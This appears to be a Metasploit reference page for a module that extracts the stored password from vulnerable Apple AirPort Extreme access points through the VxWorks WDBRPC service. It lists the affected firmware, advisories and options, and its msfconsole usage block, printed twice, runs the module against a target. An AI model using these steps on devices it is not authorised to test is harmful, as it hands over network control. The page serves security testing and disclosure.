Apple Airport Extreme Password Extraction (WDBRPC)
This module can be used to read the stored password of a vulnerable Apple Airport Extreme access point. Only a small number of firmware versions have the WDBRPC service running, however the factory configuration was vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are susceptible to this issue. Once the password is obtained, the access point can be managed using the Apple AirPort utility.
Rank
- Normal
Authors
- hdm < hdm [at] metasploit.com >
Vulnerability References
- OSVDB-66842
- http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html
- http://www.kb.cert.org/vuls/id/362332
Development
Similar Modules
- auxiliary/admin/vxworks/dlink_i2eye_autoanswer
- auxiliary/admin/vxworks/wdbrpc_memory_dump
- auxiliary/admin/vxworks/wdbrpc_reboot
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/vxworks/apple_airport_extreme_password
msf auxiliary(apple_airport_extreme_password) > set RHOST [TARGET IP]
msf auxiliary(apple_airport_extreme_password) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/vxworks/apple_airport_extreme_password
msf auxiliary(apple_airport_extreme_password) > set RHOST [TARGET IP]
msf auxiliary(apple_airport_extreme_password) > run
Module Options
| RHOST | The target address |
| RPORT | The target port (default: 17185) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |